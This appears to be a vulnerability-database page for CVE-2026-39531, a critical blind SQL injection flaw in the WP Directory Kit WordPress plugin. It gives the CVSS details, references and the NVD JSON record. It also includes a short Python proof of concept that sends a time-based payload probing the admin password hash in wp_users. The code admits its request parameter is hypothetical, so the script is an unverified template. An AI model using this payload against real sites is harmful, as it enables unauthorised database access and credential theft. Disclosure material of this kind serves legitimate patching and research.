CVE-2026-39531

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.0.

CVSS Details

CVSS Score

9.3

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WP Directory Kit <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-39531 PoC Generator (Blind SQL Injection)
# Target: WP Directory Kit <= 1.5.0

target_url = "http://example.com/wp-admin/admin-ajax.php"
# Example payload for time-based blind injection
payload = "1' AND (SELECT SUBSTRING(password, 1, 1) FROM wp_users WHERE ID=1) = 'a' AND SLEEP(5)-- -"

data = {
    "action": "wdk_search", # Action parameter is hypothetical based on common WP structures
    "term": payload
}

try:
    print("[+] Sending payload to target...")
    response = requests.post(target_url, data=data, timeout=10)
    
    # Check if the response time indicates a successful delay
    if response.elapsed.total_seconds() > 5:
        print("[+] Vulnerability confirmed: Response delayed (Blind SQL Injection).")
    else:
        print("[-] Vulnerability not detected or payload incorrect.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39531
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39531
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39531/
[4] VulDB https://vuldb.com/cve/CVE-2026-39531
[5] https://patchstack.com/database/wordpress/plugin/wpdirectorykit/vulnerability/wordpress-wp-directory-kit-plugin-1-5-0-sql-injection-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39531", "sourceIdentifier": "[email protected]", "published": "2026-05-21T16:16:23.030", "lastModified": "2026-05-21T19:10:36.607", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection.\n\nThis issue affects WP Directory Kit: from n/a through 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/wpdirectorykit/vulnerability/wordpress-wp-directory-kit-plugin-1-5-0-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}